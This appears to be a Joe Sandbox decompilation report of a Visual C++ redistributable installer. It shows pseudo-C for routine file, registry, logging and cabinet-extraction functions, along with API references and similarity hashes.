                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				 *(_t43 + 0x30) = _t44;
                                                                          				_t20 = (_t44 >> 0x0000001f & 0xfffffffe) + 1; // 0x1
                                                                          				return _t20;
                                                                          			}










                                                                          APIs
                                                                          • DosDateTimeToFileTime.KERNEL32 ref: 000D0A25
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000D0A37
                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 000D0A4A
                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000D0616,?,?), ref: 000D0A59
                                                                          Strings
                                                                          • cabextract.cpp, xrefs: 000D09F4
                                                                          • Invalid operation for this state., xrefs: 000D09FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$ChangeCloseDateFindLocalNotification
                                                                          • String ID: Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 1330928052-1751360545
                                                                          • Opcode ID: 182d42c620980e05d366b305b4db6ceaa7dd6637a67234caeaedd66da258d3ae
                                                                          • Instruction ID: a30a4300a6fc75328abbcaddff55c3b773d648cd983e1057ae1e7d9451de87f8
                                                                          • Opcode Fuzzy Hash: 182d42c620980e05d366b305b4db6ceaa7dd6637a67234caeaedd66da258d3ae
                                                                          • Instruction Fuzzy Hash: 4421CF7280071AABC750CFACCC489AA7BBCFF04720B544216F814D6AD0C775DA11CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 000F344A
                                                                          • InterlockedIncrement.KERNEL32(0011B6D8), ref: 000F3467
                                                                          • CLSIDFromProgID.OLE32(Msxml2.DOMDocument,0011B6C8,?,?,?,?,?,?), ref: 000F3482
                                                                          • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0011B6C8,?,?,?,?,?,?), ref: 000F348E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$IncrementInitializeInterlocked
                                                                          • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                          • API String ID: 2109125048-2356320334
                                                                          • Opcode ID: 601a353cd1c6ea9b29cb3b764a302a66ca63a90077e9fb9a69bd86509d3321ad
                                                                          • Instruction ID: d24b5bb9b3f3190dba481a6e9bb7c437e92e8fa5f1233987bf8136837b683fbd
                                                                          • Opcode Fuzzy Hash: 601a353cd1c6ea9b29cb3b764a302a66ca63a90077e9fb9a69bd86509d3321ad
                                                                          • Instruction Fuzzy Hash: 68F0E52074A23957D7668BA5ED4DF7B7EA5AB91FB4F000028EA00D1D94D364B9C1EEB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 92%
                                                                          			E000CE705(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
                                                                          				int _t22;
                                                                          				void* _t24;
                                                                          				long _t25;
                                                                          				void* _t34;
                                                                          				long _t36;
                                                                          				long _t38;
                                                                          				void* _t42;
                                                                          				void* _t45;
                                                                          				intOrPtr* _t47;
                                                                          				signed int _t50;
                                                                          				long _t53;
                                                                          
                                                                          				_t22 = _a8;
                                                                          				if(_t22 == 0) {
                                                                          					PostQuitMessage(0);
                                                                          					return 0;
                                                                          				}
                                                                          				_t24 = _t22 - 0xf;
                                                                          				if(_t24 == 0) {
                                                                          					_t42 = 0;
                                                                          					_t50 = _a16 & 0x40000000;
                                                                          					_t25 = GetWindowLongW(_a4, 0xffffffeb);
                                                                          					_a4 = _t25;
                                                                          					if( *_t25 == 0) {
                                                                          						_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)) + 0x10));
                                                                          						_t45 = 2;
                                                                          						_t46 =  !=  ? 0 : _t45;
                                                                          						 *((intOrPtr*)( *_t47 + 0x14))(_t47, _a16,  !=  ? 0 : _t45);
                                                                          						_t42 = 0xbadbad;
                                                                          					}
                                                                          					_push(E000C3C30(_t42));
                                                                          					_push(E000C3C30(_a4->i));
                                                                          					E000B550F(2, 0x20000190, E000C3C30(_t50));
                                                                          					return _t42;
                                                                          				}
                                                                          				_t53 = _a16;
                                                                          				_t34 = _t24 - 0x70;
                                                                          				if(_t34 == 0) {
                                                                          					SetWindowLongW(_a4, 0xffffffeb,  *_t53);
                                                                          					L6:
                                                                          					_t36 = DefWindowProcW(_a4, _a8, _a12, _t53); // executed
                                                                          					return _t36;
                                                                          				}
                                                                          				if(_t34 != 1) {
                                                                          					goto L6;
                                                                          				}
                                                                          				_t38 = DefWindowProcW(_a4, 0x82, _a12, _t53);
                                                                          				SetWindowLongW(_a4, 0xffffffeb, 0);
                                                                          				return _t38;
                                                                          			}















                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 000CE734
                                                                          • SetWindowLongW.USER32 ref: 000CE743
                                                                          • SetWindowLongW.USER32 ref: 000CE757
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 000CE767
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 000CE781
                                                                          • PostQuitMessage.USER32(00000000), ref: 000CE7DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Proc$MessagePostQuit
                                                                          • String ID:
                                                                          • API String ID: 3812958022-0
                                                                          • Opcode ID: 107f8c68ec49f59f72848a7fa08b1ca0708d7f5895db99596c11860872e3c630
                                                                          • Instruction ID: e04839e896fb24cba65dce0ee67a359b5f40c951070deb3989579ada1aa521bf
                                                                          • Opcode Fuzzy Hash: 107f8c68ec49f59f72848a7fa08b1ca0708d7f5895db99596c11860872e3c630
                                                                          • Instruction Fuzzy Hash: 9F217132118118BFEB215FA4DD49FAE3BA9EF45351F148628F906AA1B1C731DE10EB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 91%
                                                                          			E000F10C5(void* _a4, short* _a8, signed int* _a12, signed int* _a16) {
                                                                          				int* _v8;
                                                                          				int _v12;
                                                                          				int _v16;
                                                                          				signed short _t44;
                                                                          				void* _t47;
                                                                          				int* _t51;
                                                                          				long _t71;
                                                                          				signed int _t72;
                                                                          				signed int _t73;
                                                                          				signed short _t75;
                                                                          				unsigned int _t79;
                                                                          				unsigned int _t80;
                                                                          				unsigned int _t81;
                                                                          				WCHAR* _t82;
                                                                          				void* _t86;
                                                                          				void* _t87;
                                                                          				void* _t88;
                                                                          
                                                                          				_v16 = 0;
                                                                          				_t72 = 0;
                                                                          				_v12 = 0;
                                                                          				_t81 = 0;
                                                                          				_v8 = 0;
                                                                          				_t44 = RegQueryValueExW(_a4, _a8, 0,  &_v16, 0,  &_v12); // executed
                                                                          				_t79 = _v12;
                                                                          				_t75 = _t44;
                                                                          				if(_t79 == 0) {
                                                                          					L3:
                                                                          					_t86 = 0x80070002;
                                                                          					_t47 =  <=  ? _t75 : _t75 & 0x0000ffff | 0x80070000;
                                                                          					if(_t47 != 0x80070002) {
                                                                          						if(_t75 == 0) {
                                                                          							_t80 = _t79 >> 1;
                                                                          							if(_t80 == _t81) {
                                                                          								if(_v16 == 7) {
                                                                          									if(_t81 >= 2) {
                                                                          										_t51 = _v8;
                                                                          										if(0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 2)) || 0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 4))) {
                                                                          											_t86 = 0x80070057;
                                                                          										} else {
                                                                          											_t87 = 0;
                                                                          											if(_t80 != 0) {
                                                                          												do {
                                                                          													_t87 = _t87 + 1;
                                                                          													_t29 = _t72 + 1; // 0x1
                                                                          													_t63 =  !=  ? _t72 : _t29;
                                                                          													_t72 =  !=  ? _t72 : _t29;
                                                                          												} while (_t87 < _t80);
                                                                          											}
                                                                          											_t31 = _t72 - 1; // 0x0
                                                                          											_t52 = _t31;
                                                                          											 *_a16 = _t31;
                                                                          											_t86 = E000B38F6(_t31, _a16, _a12, _t52, 4, 0);
                                                                          											if(_t86 >= 0) {
                                                                          												_t73 = 0;
                                                                          												_t82 = _v8;
                                                                          												if( *_a16 > 0) {
                                                                          													while(1) {
                                                                          														_t86 = E000B21A5( *_a12 + _t73 * 4, _t82, 0);
                                                                          														if(_t86 < 0) {
                                                                          															goto L23;
                                                                          														}
                                                                          														_t82 =  &(( &(_t82[lstrlenW(_t82)]))[1]);
                                                                          														_t73 = _t73 + 1;
                                                                          														if(_t73 <  *_a16) {
                                                                          															continue;
                                                                          														} else {
                                                                          														}
                                                                          														goto L23;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										 *_a12 =  *_a12 & _t72;
                                                                          										 *_a16 =  *_a16 & _t72;
                                                                          										_t86 = 0;
                                                                          									}
                                                                          								} else {
                                                                          									_t86 = 0x8007070c;
                                                                          									_push(0x8007070c);
                                                                          									_push(0x225);
                                                                          									goto L6;
                                                                          								}
                                                                          							} else {
                                                                          								_t86 = 0x8000ffff;
                                                                          							}
                                                                          						} else {
                                                                          							_t88 = _t47;
                                                                          							_t47 = 0x80004005;
                                                                          							_t86 =  >=  ? 0x80004005 : _t88;
                                                                          							_push(_t86);
                                                                          							_push(0x21a);
                                                                          							L6:
                                                                          							_push("regutil.cpp");
                                                                          							E000B37D3(_t47);
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_t81 = _t79 >> 1;
                                                                          					_t86 = E000B1EDE( &_v8, _t81);
                                                                          					if(_t86 >= 0) {
                                                                          						_t71 = RegQueryValueExW(_a4, _a8, 0,  &_v16, _v8,  &_v12); // executed
                                                                          						_t79 = _v12;
                                                                          						_t75 = _t71;
                                                                          						goto L3;
                                                                          					}
                                                                          				}
                                                                          				L23:
                                                                          				_t48 = _v8;
                                                                          				if(_v8 != 0) {
                                                                          					E000F54EF(_t48);
                                                                          				}
                                                                          				return _t86;
                                                                          			}





















                                                                          APIs
                                                                          • RegQueryValueExW.KERNELBASE(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000F10ED
                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,000C6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 000F1126
                                                                          • lstrlenW.KERNEL32(?,?,-00000001,00000004,00000000), ref: 000F121A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$lstrlen
                                                                          • String ID: BundleUpgradeCode$regutil.cpp
                                                                          • API String ID: 3790715954-1648651458
                                                                          • Opcode ID: 8c9416771dc1232f34534b04c1c71429bd713aaaac978c6b3429ecce67e61439
                                                                          • Instruction ID: 72010e5996143942323ee5b36d776a9652a2c49e7c44d55b6362fae7073385c9
                                                                          • Opcode Fuzzy Hash: 8c9416771dc1232f34534b04c1c71429bd713aaaac978c6b3429ecce67e61439
                                                                          • Instruction Fuzzy Hash: 1941BE31A0021EEBDB258F98C884AFEB7B9FF48710F114169EA15EB610D635DD11ABA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000F4212(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				void* _v16;
                                                                          				char _v20;
                                                                          				void* _t29;
                                                                          				void* _t34;
                                                                          				void* _t37;
                                                                          				signed short* _t39;
                                                                          				signed int _t42;
                                                                          				void* _t44;
                                                                          				void* _t45;
                                                                          				signed int _t49;
                                                                          				void* _t50;
                                                                          
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				_t29 = E000F4315(_a4, _a8); // executed
                                                                          				_t50 = _t29;
                                                                          				if(_t50 == 0) {
                                                                          					L21:
                                                                          					if(_v12 != 0) {
                                                                          						E000B2647(_v12, _v8);
                                                                          					}
                                                                          					if(_v16 != 0) {
                                                                          						RegCloseKey(_v16);
                                                                          					}
                                                                          					return _t50;
                                                                          				}
                                                                          				_t34 = E000F0E3F(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 1,  &_v16);
                                                                          				if(_t34 == 0x80070002 || _t34 < 0) {
                                                                          					L20:
                                                                          					goto L21;
                                                                          				} else {
                                                                          					_t37 = E000F10C5(_v16, L"PendingFileRenameOperations",  &_v12,  &_v8);
                                                                          					if(_t37 != 0x80070002 && _t37 >= 0) {
                                                                          						_t49 = 0;
                                                                          						if(_v8 <= 0) {
                                                                          							goto L20;
                                                                          						}
                                                                          						_a8 = 0x5c;
                                                                          						_t45 = 0x3f;
                                                                          						do {
                                                                          							_t39 =  *(_v12 + _t49 * 4);
                                                                          							if(_t39 == 0) {
                                                                          								goto L17;
                                                                          							}
                                                                          							_t42 =  *_t39 & 0x0000ffff;
                                                                          							if(_t42 == 0) {
                                                                          								goto L17;
                                                                          							}
                                                                          							if(_a8 == _t42 && _t45 == _t39[1] && _t45 == _t39[2]) {
                                                                          								_t44 = 0x5c;
                                                                          								if(_t44 == _t39[3]) {
                                                                          									_t39 =  &(_t39[4]);
                                                                          								}
                                                                          							}
                                                                          							if(E000B2D05( &_v20, _a4, _t39,  &_v20) < 0) {
                                                                          								goto L20;
                                                                          							} else {
                                                                          								if(_v20 == 2) {
                                                                          									_t50 = 0;
                                                                          									goto L20;
                                                                          								}
                                                                          								_t45 = 0x3f;
                                                                          							}
                                                                          							L17:
                                                                          							_t49 = _t49 + 2;
                                                                          						} while (_t49 < _v8);
                                                                          					}
                                                                          					goto L20;
                                                                          				}
                                                                          			}

















                                                                          APIs
                                                                            • Part of subcall function 000F4315: FindFirstFileW.KERNELBASE(?,?,00000000,00000000,?), ref: 000F4350
                                                                            • Part of subcall function 000F4315: FindClose.KERNEL32(00000000), ref: 000F435C
                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll), ref: 000F4305
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                            • Part of subcall function 000F10C5: RegQueryValueExW.KERNELBASE(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000F10ED
                                                                            • Part of subcall function 000F10C5: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,000C6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 000F1126
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFindQueryValue$FileFirstOpen
                                                                          • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                          • API String ID: 3397690329-3978359083
                                                                          • Opcode ID: 96a3faf7a479cd85b92b21aaad7d1b9eb5879ed4391482e15c8543ff9f3c217f
                                                                          • Instruction ID: 3f2818ffce00b8ec860e5b647d5dae0f0e6f3cacb0e16800141df5593c535ed5
                                                                          • Opcode Fuzzy Hash: 96a3faf7a479cd85b92b21aaad7d1b9eb5879ed4391482e15c8543ff9f3c217f
                                                                          • Instruction Fuzzy Hash: BF319035A0021DAADFA1AFD5C8419FFB7B9EB00350F94417AFE00A6551D7319A40EB54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E000F0658(void* __ecx, void* __edx, CHAR* _a4) {
                                                                          				long _v8;
                                                                          				int _t9;
                                                                          				int _t13;
                                                                          				CHAR* _t18;
                                                                          				void* _t21;
                                                                          				void* _t22;
                                                                          				void* _t25;
                                                                          				void* _t28;
                                                                          
                                                                          				_t22 = __edx;
                                                                          				_push(__ecx);
                                                                          				_t18 = _a4;
                                                                          				_t28 = 0;
                                                                          				_t25 = 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				_t9 = lstrlenA(_t18);
                                                                          				_t21 =  *0x11a774; // 0xffffffff
                                                                          				_a4 = _t9;
                                                                          				if(_t21 != 0xffffffff) {
                                                                          					if(_t9 == 0) {
                                                                          						L9:
                                                                          						return _t28;
                                                                          					} else {
                                                                          						goto L4;
                                                                          					}
                                                                          					while(1) {
                                                                          						L4:
                                                                          						_t13 = WriteFile(_t21, _t25 + _t18, _t9 - _t25,  &_v8, 0); // executed
                                                                          						if(_t13 != 0) {
                                                                          							goto L6;
                                                                          						}
                                                                          						_t28 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						if(_t28 < 0) {
                                                                          							E000B37D3(_t14, "logutil.cpp", 0x310, _t28);
                                                                          							goto L9;
                                                                          						}
                                                                          						L6:
                                                                          						_t25 = _t25 + _v8;
                                                                          						_t9 = _a4;
                                                                          						if(_t25 >= _t9) {
                                                                          							goto L9;
                                                                          						}
                                                                          						_t21 =  *0x11a774; // 0xffffffff
                                                                          					}
                                                                          				}
                                                                          				_t28 = E000B2384(_t21, _t22, 0x11b608, _t18, 0);
                                                                          				if(_t28 >= 0) {
                                                                          					_t28 = 0;
                                                                          				}
                                                                          				goto L9;
                                                                          			}












                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,?,000EFF0B,000CA1AD,000CA1AD,00000000,00000000,0000FDE9,?,?,000CA1AD), ref: 000F066A
                                                                          • WriteFile.KERNELBASE(FFFFFFFF,00000000,00000000,0000FDE9,00000000,?,?,000EFF0B,000CA1AD,000CA1AD,00000000,00000000,0000FDE9,?,?,000CA1AD), ref: 000F06A6
                                                                          • GetLastError.KERNEL32(?,?,000EFF0B,000CA1AD,000CA1AD,00000000,00000000,0000FDE9,?,?,000CA1AD), ref: 000F06B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWritelstrlen
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 606256338-637279948
                                                                          • Opcode ID: c4f9c3724b3cd90ccbb7014bd3bebe091c22f0ffe99703cfce3233c5cd0147ee
                                                                          • Instruction ID: 5cb276b9518f05e485b138dd190593e737efecc1683b6065fb1a87b5c5f1928f
                                                                          • Opcode Fuzzy Hash: c4f9c3724b3cd90ccbb7014bd3bebe091c22f0ffe99703cfce3233c5cd0147ee
                                                                          • Instruction Fuzzy Hash: 8911E972A012286BD3249A75CD48DFFBAACEBD4761B004225FE05D7941DB319D10D6E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E000D074E(void* __ecx, void* __eflags, void* _a4, void* _a8, long _a12) {
                                                                          				long _v8;
                                                                          				int _t19;
                                                                          				signed short _t22;
                                                                          				signed int _t27;
                                                                          				intOrPtr _t31;
                                                                          				struct _OVERLAPPED* _t34;
                                                                          
                                                                          				_t27 =  *0x11aac0; // 0x0
                                                                          				_t34 = 0;
                                                                          				_v8 = 0;
                                                                          				_t31 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t27 * 4)) + 4));
                                                                          				E000D114F(__eflags, _t31 + 0x1c, _a4, _a12); // executed
                                                                          				_t19 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                                                          				if(_t19 == 0) {
                                                                          					_t22 = GetLastError();
                                                                          					_t38 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					E000B37D3(0x80004005, "cabextract.cpp", 0x2ec, _t34);
                                                                          					_push("Failed to read during cabinet extraction.");
                                                                          					E000F012F();
                                                                          					_t27 = _t34;
                                                                          				}
                                                                          				 *((intOrPtr*)(_t31 + 0x30)) = _t34;
                                                                          				_t21 =  <  ? _t27 | 0xffffffff : _v8;
                                                                          				return  <  ? _t27 | 0xffffffff : _v8;
                                                                          			}










                                                                          APIs
                                                                            • Part of subcall function 000D114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,000D077D,?,?,?), ref: 000D1177
                                                                            • Part of subcall function 000D114F: GetLastError.KERNEL32(?,000D077D,?,?,?), ref: 000D1181
                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 000D078B
                                                                          • GetLastError.KERNEL32 ref: 000D0795
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$PointerRead
                                                                          • String ID: @Met$Failed to read during cabinet extraction.$cabextract.cpp
                                                                          • API String ID: 2170121939-2568642345
                                                                          • Opcode ID: b4311b52141434e67dab94a3e7c5d4ba6490d250ce08072058a6d10f10282f4f
                                                                          • Instruction ID: 668ecaf1bd92a5b224712b3af072dad163f47d94b3e92ab61ea16098f07ea6e9
                                                                          • Opcode Fuzzy Hash: b4311b52141434e67dab94a3e7c5d4ba6490d250ce08072058a6d10f10282f4f
                                                                          • Instruction Fuzzy Hash: 9301A572A00324BBDB109FA8DC04EDA7BA9FF04760F014119FD08D7650D7319A10DBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000F4840(void* __ecx, WCHAR* _a4, intOrPtr _a8) {
                                                                          				void* _t4;
                                                                          				void* _t6;
                                                                          				void* _t14;
                                                                          				void* _t16;
                                                                          				void* _t18;
                                                                          
                                                                          				_t14 = __ecx;
                                                                          				if(_a4 != 0) {
                                                                          					_t6 = CreateFileW(_a4, 0x80, 1, 0, 3, 0x80, 0); // executed
                                                                          					_t16 = _t6;
                                                                          					if(_t16 != 0xffffffff) {
                                                                          						_t18 = E000F48CB(_t14, _t16, _a8);
                                                                          						FindCloseChangeNotification(_t16); // executed
                                                                          					} else {
                                                                          						_t21 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						_t18 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						E000B37D3(0x80004005, "fileutil.cpp", 0x228, _t18);
                                                                          					}
                                                                          				} else {
                                                                          					_t18 = 0x80070057;
                                                                          					E000B37D3(_t4, "fileutil.cpp", 0x223, 0x80070057);
                                                                          				}
                                                                          				return _t18;
                                                                          			}









                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,000D8A30,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 000F4874
                                                                          • GetLastError.KERNEL32(?,000D8A30,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,userVersion,000002C0,000000B0), ref: 000F4881
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLast
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1214770103-2299628883
                                                                          • Opcode ID: 0900e41c390aca23c95fb1af164d760e124f10df83790796eeed7adcca463cbd
                                                                          • Instruction ID: 26fd6f9acfaa6d7aa2b65358c85478497f0731bd68dd40bd48d69685eb1e18cd
                                                                          • Opcode Fuzzy Hash: 0900e41c390aca23c95fb1af164d760e124f10df83790796eeed7adcca463cbd
                                                                          • Instruction Fuzzy Hash: 8A018672680224B7F73126A5AC49FBF3698DB44BA0F114221FF05AB9D1CE694D41A6F4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 31%
                                                                          			E000D114F(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                          				int _t11;
                                                                          				void* _t19;
                                                                          				long _t20;
                                                                          
                                                                          				_t20 = 0x80070490;
                                                                          				_t19 = E000D1127(_a4, _a8);
                                                                          				if(_t19 != 0) {
                                                                          					_t20 = 0;
                                                                          					_push(0);
                                                                          					_t11 = SetFilePointerEx(_a8,  *(_t19 + 8),  *(_t19 + 0xc), 0); // executed
                                                                          					if(_t11 != 0) {
                                                                          						 *(_t19 + 8) =  *(_t19 + 8) + _a12;
                                                                          						asm("adc [edi+0xc], esi");
                                                                          					} else {
                                                                          						_t23 =  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
                                                                          						_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
